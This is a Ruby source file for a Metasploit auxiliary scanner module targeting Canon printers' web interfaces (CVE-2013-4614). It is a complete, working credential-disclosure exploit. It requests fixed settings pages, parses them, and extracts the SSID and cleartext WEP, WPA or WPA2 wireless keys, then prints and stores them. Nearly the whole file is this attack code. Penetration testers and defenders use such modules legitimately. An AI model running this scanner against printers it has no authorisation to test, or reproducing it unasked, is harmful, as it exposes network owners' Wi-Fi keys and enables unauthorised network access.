Path: blob/master/modules/auxiliary/scanner/http/canon_wireless.rb
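##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'nokogiri'

# Auxiliary scanner that reads two settings pages from a Canon printer's
# embedded web interface and records the LAN mode, SSID, encryption type and
# wireless key they contain (CVE-2013-4614).
#
# The module sends plain GET requests for the pages. An HTTP 200 means the
# printer served the settings page to this request; an HTTP 401 is reported as
# "Authentication failed", i.e. the interface asked for credentials.
#
# The result string holds the wireless key in cleartext and is both printed
# and stored as a note (type 'canon.wireless'), so the console log and the
# workspace database are sensitive after a positive finding. A host that
# yields a key should be reported with the key treated as exposed.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  # Registers the module metadata (name, description, references).
  #
  # @param info [Hash] metadata passed in by the framework and merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Canon Printer Wireless Configuration Disclosure',
      'Description' => %q{
        This module enumerates wireless credentials from Canon printers with a web interface.
        It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870,
        MX890, MX920.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
        ],
      'References' => [
        [ 'CVE', '2013-4614' ],
        [ 'OSVDB', '94417' ],
        [ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']
      ],
      'DisclosureDate' => '2013-06-18'))
  end

  # Reads the LAN settings page and returns the selected LAN mode and SSID.
  #
  # @return [Array(String, String), nil] [lan_setting, ssid]; ssid is only
  #   filled in when the wireless option is selected. nil when the page could
  #   not be fetched or exactly one checked LAN_OPT1 input was not found.
  def get_network_settings
    html = fetch_settings_page('/English/pages_MacUS/lan_set_content.html')
    return nil unless html

    checked_lan_setting = html.xpath('//input[@name="LAN_OPT1" and @checked]')
    unless checked_lan_setting.count == 1
      print_error("#{rhost}:#{rport} Could not determine LAN Settings.")
      return nil
    end

    lan_setting = ''
    ssid = ''
    case checked_lan_setting[0]['value']
    when '0'
      lan_setting = 'Do not use LAN'
    when '1'
      lan_setting = 'Use wired LAN'
    when '2'
      lan_setting = 'Use wireless LAN'

      ssid_input = html.xpath('//input[@name="LAN_TXT1"]')
      # to_s: an input without a value attribute yields nil.
      ssid = ssid_input[0]['value'].to_s if ssid_input.count == 1
    end

    [lan_setting, ssid]
  end

  # Reads the wireless settings page and returns the encryption type and key.
  #
  # @return [Array(String, String), nil] [encryption_setting, encryption_key];
  #   for WEP the non-empty key slots are joined with ', '. nil when the page
  #   could not be fetched or no checked WLS_OPT1 input was found.
  def get_wireless_key
    # The original error path interpolated `ip`, which is not defined in this
    # method and raised NameError; the shared fetch helper reports via rhost.
    html = fetch_settings_page('/English/pages_MacUS/wls_set_content.html')
    return nil unless html

    checked_encryption_setting = html.xpath('//input[@name="WLS_OPT1" and @checked]').first
    unless checked_encryption_setting
      # Previously this case raised NoMethodError on nil.
      print_error("#{rhost}:#{rport} Could not determine wireless encryption settings.")
      return nil
    end

    encryption_setting = ''
    encryption_key = ''
    case checked_encryption_setting['value']
    when '0'
      encryption_setting = 'None'
    when '1'
      encryption_setting = 'WEP'
      wep_key_inputs = html.xpath('//input[starts-with(@name, "WLS_TXT1") and not(@value="")]')
      encryption_key = wep_key_inputs.collect { |x| x['value'] }.join(', ')
    when '2'
      encryption_setting = 'WPA'
      encryption_key = first_input_value(html, 'WLS_TXT2')
    when '3'
      encryption_setting = 'WPA2'
      encryption_key = first_input_value(html, 'WLS_TXT3')
    end

    [encryption_setting, encryption_key]
  end

  # Scanner entry point, called once per target host.
  #
  # Builds a one-line summary, stores it as a 'canon.wireless' note and prints
  # it. The SSID and key are taken verbatim from the device's HTML, so the
  # stored string is device-controlled text and contains the cleartext key.
  #
  # @param ip [String] address of the host being scanned
  def run_host(ip)
    ns = get_network_settings
    return if ns.nil?

    good_string = "#{rhost}:#{rport} Option: #{ns[0]}"
    if ns[0] == 'Use wireless LAN'
      good_string += "\tSSID: #{ns[1]}"

      # get_wireless_key returns nil on any fetch or parse failure; the LAN
      # mode and SSID are still worth recording in that case.
      wireless_key = get_wireless_key
      if wireless_key
        good_string += "\tEncryption Type: #{wireless_key[0]}\tKey: #{wireless_key[1]}"
      end
    end

    report_note({
      :data => good_string,
      :type => 'canon.wireless',
      :host => ip,
      :port => rport
    })

    print_good good_string
  end

  private

  # Requests one settings page and returns its parsed body.
  #
  # @param uri [String] path of the page on the printer
  # @return [Nokogiri::HTML::Document, nil] parsed body on HTTP 200, nil on a
  #   connection error, a missing response or any other status code
  def fetch_settings_page(uri)
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => uri
      })
    rescue StandardError
      print_error("#{rhost}:#{rport} Could not connect.")
      return nil
    end

    unless res
      vprint_error("#{rhost}:#{rport} No response")
      return nil
    end

    case res.code
    when 200
      return Nokogiri::HTML(res.body)
    when 401
      print_error("#{rhost}:#{rport} Authentication failed")
    when 404
      print_error("#{rhost}:#{rport} File not found")
    else
      vprint_error("#{rhost}:#{rport} Unexpected HTTP status #{res.code}")
    end

    nil
  end

  # Returns the value attribute of the first input with the given name.
  #
  # @param html [Nokogiri::HTML::Document] parsed settings page
  # @param name [String] value of the input's name attribute (a fixed field
  #   name supplied by this module, never device or user data)
  # @return [String] the value, or '' when the input or its value is absent
  def first_input_value(html, name)
    node = html.xpath("//input[@name=\"#{name}\"]").first
    node ? node['value'].to_s : ''
  end
end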